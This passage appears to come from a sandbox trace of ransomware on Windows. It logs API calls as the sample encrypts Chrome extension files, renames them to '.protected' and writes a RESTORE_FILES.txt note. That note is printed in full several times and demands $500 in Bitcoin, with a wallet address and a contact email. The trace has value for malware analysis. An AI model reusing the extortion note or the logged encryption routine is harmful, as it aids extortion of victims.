1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.633] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.634] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.634] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.634] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.634] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.634] CloseHandle (hObject=0x164) returned 1 [0080.635] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.635] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0080.635] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0080.635] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0080.635] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0080.635] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0080.635] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no") returned 141 [0080.635] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0080.635] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0080.635] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\*") returned 143 [0080.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.635] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.635] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.635] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.635] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.635] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.635] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\.") returned 143 [0080.635] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.635] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.635] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.635] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.635] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.635] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.635] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.635] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\..") returned 144 [0080.635] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.635] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.635] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.636] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.636] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0080.636] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.636] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.636] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.636] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0080.636] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0080.636] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0080.636] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.636] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x96, lpOverlapped=0x0) returned 1 [0080.637] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.637] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x96, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x96, lpOverlapped=0x0) returned 1 [0080.637] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.637] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.638] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.638] CloseHandle (hObject=0x168) returned 1 [0080.638] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.protected") returned 165 [0080.638] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.protected")) returned 1 [0080.638] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.638] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.638] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0080.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.639] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.639] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.640] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.640] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.640] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.640] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.640] CloseHandle (hObject=0x164) returned 1 [0080.640] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0080.640] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl") returned 141 [0080.640] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0080.640] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0080.640] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\*") returned 143 [0080.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.641] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.641] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.641] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.641] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.641] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.641] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\.") returned 143 [0080.642] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.642] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.642] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.642] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.642] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.642] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.642] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.642] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\..") returned 144 [0080.642] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.642] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.642] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.642] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0080.642] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.642] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.642] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.642] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.643] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0080.643] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.643] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0080.643] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.643] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0080.643] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.643] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb4, lpOverlapped=0x0) returned 1 [0080.644] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.644] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb4, lpOverlapped=0x0) returned 1 [0080.644] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.644] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.644] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.644] CloseHandle (hObject=0x168) returned 1 [0080.644] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.protected") returned 165 [0080.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.protected")) returned 1 [0080.645] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.645] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.645] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0080.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.645] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.645] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.646] 